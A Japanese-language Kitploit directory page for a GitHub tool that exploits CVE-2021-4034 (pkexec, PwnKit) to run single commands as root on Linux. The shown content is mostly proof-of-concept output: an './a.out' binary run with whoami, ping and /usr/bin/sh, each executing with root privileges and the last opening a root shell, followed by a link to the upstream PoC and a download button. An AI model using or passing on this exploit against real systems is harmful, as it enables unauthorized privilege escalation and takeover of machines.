Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2021-4034 — 単一コマンド用のCVE-2021-4034 | Kitploit
ツール/GitHubGitHub/wudicainiao/cve-2021-4034
特権昇格脆弱性分析エクスプロイトペネトレーションテストバイナリエクスプロイト
GitHubwudicainiao/cve-2021-4034

cve-2021-4034

単一コマンド用のCVE-2021-4034

リポジトリを見る
10124年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-4034

このツールはpkexecの単一コマンド実行に使用します

POC

whoami

root@kitploit:~
[test@localhost cc]$ ./a.out /usr/bin/whoami
execute success : 
root

ping 8.8.8.8

root@kitploit:~
[test@localhost cc]$ ./a.out /usr/bin/ping 8.8.8.8
execute success : 
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=114 time=61.4 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=114 time=67.0 ms
64 bytes from 8.8.8.8: icmp_seq=3 ttl=114 time=59.6 ms
64 bytes from 8.8.8.8: icmp_seq=4 ttl=114 time=59.0 ms
64 bytes from 8.8.8.8: icmp_seq=5 ttl=114 time=58.5 ms
64 bytes from 8.8.8.8: icmp_seq=6 ttl=114 time=61.2 ms
^C
--- 8.8.8.8 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5015ms
rtt min/avg/max/mdev = 58.531/61.160/67.068/2.850 ms

/usr/bin/sh

root@kitploit:~
 [niao@localhost cc]$ ./a.out /usr/bin/sh
execute success : 
sh-4.2# /usr/bin/whoami 
root
sh-4.2# 

https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c より改変

ツールをダウンロード